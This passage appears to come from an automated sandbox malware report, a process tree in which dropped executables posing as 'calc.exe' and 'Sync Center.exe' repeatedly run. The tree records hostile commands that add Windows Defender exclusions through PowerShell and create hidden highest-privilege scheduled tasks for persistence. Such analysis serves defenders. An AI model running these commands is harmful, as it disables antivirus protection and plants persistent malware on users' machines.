"cmd" /c schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST & exit
41⤵
PID:4740

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST
42⤵
- Scheduled Task/Job: Scheduled Task
PID:5332

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sync Center.exe'
40⤵
PID:3864

C:\Users\Admin\AppData\Local\Temp\Sync Center.exe
"C:\Users\Admin\AppData\Local\Temp\Sync Center.exe"
40⤵
PID:5388

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\calc.exe'
39⤵
PID:5532

C:\Users\Admin\AppData\Local\Temp\calc.exe
"C:\Users\Admin\AppData\Local\Temp\calc.exe"
39⤵
PID:3784

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST & exit
40⤵
PID:1816

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST
41⤵
PID:5884

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST & exit
40⤵
PID:5012

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST
41⤵
PID:5132

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sync Center.exe'
39⤵
- Command and Scripting Interpreter: PowerShell
PID:5816

C:\Users\Admin\AppData\Local\Temp\Sync Center.exe
"C:\Users\Admin\AppData\Local\Temp\Sync Center.exe"
39⤵
PID:3876

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\calc.exe'
38⤵
PID:5808

C:\Users\Admin\AppData\Local\Temp\calc.exe
"C:\Users\Admin\AppData\Local\Temp\calc.exe"
38⤵
PID:5452

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST & exit
39⤵
PID:808

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST
40⤵
- Scheduled Task/Job: Scheduled Task
PID:5804

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST & exit
39⤵
PID:5748

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST
40⤵
- Scheduled Task/Job: Scheduled Task
PID:6132

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sync Center.exe'
38⤵
PID:3532

C:\Users\Admin\AppData\Local\Temp\Sync Center.exe
"C:\Users\Admin\AppData\Local\Temp\Sync Center.exe"
38⤵
PID:5348

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\calc.exe'
37⤵
- Command and Scripting Interpreter: PowerShell
PID:1916

C:\Users\Admin\AppData\Local\Temp\calc.exe
"C:\Users\Admin\AppData\Local\Temp\calc.exe"
37⤵
PID:5220

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST & exit
38⤵
PID:4352

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST
39⤵
PID:3516

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST & exit
38⤵
PID:2404

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST
39⤵
- Scheduled Task/Job: Scheduled Task
PID:1132

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sync Center.exe'
37⤵
PID:5524

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
38⤵
PID:1492

C:\Users\Admin\AppData\Local\Temp\Sync Center.exe
"C:\Users\Admin\AppData\Local\Temp\Sync Center.exe"
37⤵
PID:244

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\calc.exe'
36⤵
PID:6040

C:\Users\Admin\AppData\Local\Temp\calc.exe
"C:\Users\Admin\AppData\Local\Temp\calc.exe"
36⤵
PID:2148

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST & exit
37⤵
PID:5764

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST
38⤵
PID:5816

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST & exit
37⤵
PID:1884

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST
38⤵
- Scheduled Task/Job: Scheduled Task
PID:2456

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sync Center.exe'
36⤵
PID:5928

C:\Users\Admin\AppData\Local\Temp\Sync Center.exe
"C:\Users\Admin\AppData\Local\Temp\Sync Center.exe"
36⤵
PID:4564

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\calc.exe'
35⤵
PID:5464

C:\Users\Admin\AppData\Local\Temp\calc.exe
"C:\Users\Admin\AppData\Local\Temp\calc.exe"
35⤵
PID:2136

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST & exit
36⤵
PID:4244

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST
37⤵
PID:5668

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST & exit
36⤵
PID:1660

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST
37⤵
- Scheduled Task/Job: Scheduled Task
PID:3456

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sync Center.exe'
35⤵
- Command and Scripting Interpreter: PowerShell
PID:6016

C:\Users\Admin\AppData\Local\Temp\Sync Center.exe
"C:\Users\Admin\AppData\Local\Temp\Sync Center.exe"
35⤵
PID:5552

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\calc.exe'
34⤵
- Command and Scripting Interpreter: PowerShell
PID:4272

C:\Users\Admin\AppData\Local\Temp\calc.exe
"C:\Users\Admin\AppData\Local\Temp\calc.exe"
34⤵
PID:5820

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST & exit
35⤵
PID:1900

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST
36⤵
PID:1492

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST & exit
35⤵
PID:6104

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST
36⤵
- Scheduled Task/Job: Scheduled Task
PID:5492

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sync Center.exe'
34⤵
PID:4772

C:\Users\Admin\AppData\Local\Temp\Sync Center.exe
"C:\Users\Admin\AppData\Local\Temp\Sync Center.exe"
34⤵
PID:5112

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\calc.exe'
33⤵
- Command and Scripting Interpreter: PowerShell
PID:3464

C:\Users\Admin\AppData\Local\Temp\calc.exe
"C:\Users\Admin\AppData\Local\Temp\calc.exe"
33⤵
PID:936

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST & exit
34⤵
PID:5224

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST
35⤵
PID:3532

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST & exit
34⤵
PID:3948

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST
35⤵
- Scheduled Task/Job: Scheduled Task
PID:652

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sync Center.exe'
33⤵
- Command and Scripting Interpreter: PowerShell
PID:5612

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
34⤵
PID:1776

C:\Users\Admin\AppData\Local\Temp\Sync Center.exe
"C:\Users\Admin\AppData\Local\Temp\Sync Center.exe"
33⤵
PID:3188

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\calc.exe'
32⤵
PID:1680

C:\Users\Admin\AppData\Local\Temp\calc.exe
"C:\Users\Admin\AppData\Local\Temp\calc.exe"
32⤵
PID:860

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST & exit
33⤵
PID:1572

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST
34⤵
- Scheduled Task/Job: Scheduled Task
PID:5816

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST & exit
33⤵
PID:5568

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST
34⤵
- Scheduled Task/Job: Scheduled Task
PID:5316

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sync Center.exe'
32⤵
PID:5600

C:\Users\Admin\AppData\Local\Temp\Sync Center.exe
"C:\Users\Admin\AppData\Local\Temp\Sync Center.exe"
32⤵
PID:2384

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\calc.exe'
31⤵
PID:5392

C:\Users\Admin\AppData\Local\Temp\calc.exe
"C:\Users\Admin\AppData\Local\Temp\calc.exe"
31⤵
PID:5324

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST & exit
32⤵
PID:4464

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST
33⤵
PID:1604

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST & exit
32⤵
PID:4200

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST
33⤵
PID:5192

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sync Center.exe'
31⤵
PID:5916

C:\Users\Admin\AppData\Local\Temp\Sync Center.exe
"C:\Users\Admin\AppData\Local\Temp\Sync Center.exe"
31⤵
PID:5596

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\calc.exe'
30⤵
- Command and Scripting Interpreter: PowerShell
PID:1916

C:\Users\Admin\AppData\Local\Temp\calc.exe
"C:\Users\Admin\AppData\Local\Temp\calc.exe"
30⤵
PID:1660

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST & exit
31⤵
PID:5244

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST
32⤵
- Scheduled Task/Job: Scheduled Task
PID:5204

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST & exit
31⤵
PID:3652

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST
32⤵
PID:1776

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sync Center.exe'
30⤵
PID:5560

C:\Users\Admin\AppData\Local\Temp\Sync Center.exe
"C:\Users\Admin\AppData\Local\Temp\Sync Center.exe"
30⤵
PID:5440

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\calc.exe'
29⤵
- Command and Scripting Interpreter: PowerShell
PID:5408

C:\Users\Admin\AppData\Local\Temp\calc.exe
"C:\Users\Admin\AppData\Local\Temp\calc.exe"
29⤵
PID:692

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST & exit
30⤵
PID:3024

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST
31⤵
- Scheduled Task/Job: Scheduled Task
PID:5932

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST & exit
30⤵
PID:5600

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST
31⤵
- Scheduled Task/Job: Scheduled Task
PID:5860

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sync Center.exe'
29⤵
PID:5140

C:\Users\Admin\AppData\Local\Temp\Sync Center.exe
"C:\Users\Admin\AppData\Local\Temp\Sync Center.exe"
29⤵
PID:1524

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\calc.exe'
28⤵
PID:5684

C:\Users\Admin\AppData\Local\Temp\calc.exe
"C:\Users\Admin\AppData\Local\Temp\calc.exe"
28⤵
PID:5240

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST & exit
29⤵
PID:5656

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST
30⤵
PID:3036

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST & exit
29⤵
PID:5324

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST
30⤵
PID:5252

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sync Center.exe'
28⤵
- Command and Scripting Interpreter: PowerShell
PID:6012

C:\Users\Admin\AppData\Local\Temp\Sync Center.exe
"C:\Users\Admin\AppData\Local\Temp\Sync Center.exe"
28⤵
PID:1496

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\calc.exe'
27⤵
- Command and Scripting Interpreter: PowerShell
PID:5540

C:\Users\Admin\AppData\Local\Temp\calc.exe
"C:\Users\Admin\AppData\Local\Temp\calc.exe"
27⤵
PID:2464

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST & exit
28⤵
PID:2088

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST
29⤵
PID:456

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST & exit
28⤵
PID:4556

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST
29⤵
PID:5368

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sync Center.exe'
27⤵
PID:5152

C:\Users\Admin\AppData\Local\Temp\Sync Center.exe
"C:\Users\Admin\AppData\Local\Temp\Sync Center.exe"
27⤵
PID:5548

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\calc.exe'
26⤵
PID:4964

C:\Users\Admin\AppData\Local\Temp\calc.exe
"C:\Users\Admin\AppData\Local\Temp\calc.exe"
26⤵
PID:5908

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST & exit
27⤵
PID:5796

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST
28⤵
- Scheduled Task/Job: Scheduled Task
PID:2300

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST & exit
27⤵
PID:5328

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST
28⤵
- Scheduled Task/Job: Scheduled Task
PID:5252

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sync Center.exe'
26⤵
- Command and Scripting Interpreter: PowerShell
PID:5760

C:\Users\Admin\AppData\Local\Temp\Sync Center.exe
"C:\Users\Admin\AppData\Local\Temp\Sync Center.exe"
26⤵
PID:1816

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\calc.exe'
25⤵
PID:5944

C:\Users\Admin\AppData\Local\Temp\calc.exe
"C:\Users\Admin\AppData\Local\Temp\calc.exe"
25⤵
- Executes dropped EXE
PID:5488

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST & exit
26⤵
PID:5400

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST
27⤵
- Scheduled Task/Job: Scheduled Task
PID:1320

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST & exit
26⤵
PID:5636

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST
27⤵
PID:4640

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sync Center.exe'
25⤵
- Command and Scripting Interpreter: PowerShell
PID:5932

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
26⤵
PID:3812

C:\Users\Admin\AppData\Local\Temp\Sync Center.exe
"C:\Users\Admin\AppData\Local\Temp\Sync Center.exe"
25⤵
PID:3032

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\calc.exe'
24⤵
PID:5732

C:\Users\Admin\AppData\Local\Temp\calc.exe
"C:\Users\Admin\AppData\Local\Temp\calc.exe"
24⤵
- Executes dropped EXE
PID:2940

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST & exit
25⤵
PID:5232

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST
26⤵
PID:2080

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST & exit
25⤵
PID:4184

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST
26⤵
PID:5584

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sync Center.exe'
24⤵
PID:1280

C:\Users\Admin\AppData\Local\Temp\Sync Center.exe
"C:\Users\Admin\AppData\Local\Temp\Sync Center.exe"
24⤵
- Executes dropped EXE
PID:5620

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\calc.exe'
23⤵
PID:5224

C:\Users\Admin\AppData\Local\Temp\calc.exe
"C:\Users\Admin\AppData\Local\Temp\calc.exe"
23⤵
- Executes dropped EXE
PID:5424

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST & exit
24⤵
PID:5716

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST
25⤵
- Scheduled Task/Job: Scheduled Task
PID:1736

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST & exit
24⤵
PID:5720

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST
25⤵
PID:2980

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sync Center.exe'
23⤵
- Command and Scripting Interpreter: PowerShell
PID:5468

C:\Users\Admin\AppData\Local\Temp\Sync Center.exe
"C:\Users\Admin\AppData\Local\Temp\Sync Center.exe"
23⤵
- Executes dropped EXE
PID:5748

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\calc.exe'
22⤵
PID:3020

C:\Users\Admin\AppData\Local\Temp\calc.exe
"C:\Users\Admin\AppData\Local\Temp\calc.exe"
22⤵
- Executes dropped EXE
PID:3452

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST & exit
23⤵
PID:5396

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST
24⤵
- Scheduled Task/Job: Scheduled Task
PID:5588

C:\Windows\SYSTEM32\cmd.exe
